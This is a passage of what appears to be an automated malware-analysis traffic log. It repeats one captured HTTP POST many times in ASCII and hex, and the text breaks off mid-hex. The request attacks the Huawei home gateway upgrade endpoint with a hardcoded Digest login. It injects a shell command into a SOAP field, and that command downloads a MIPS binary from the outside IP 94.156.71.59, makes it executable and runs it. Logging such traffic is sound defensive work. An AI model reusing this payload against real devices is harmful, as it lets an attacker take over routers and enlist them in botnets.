0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 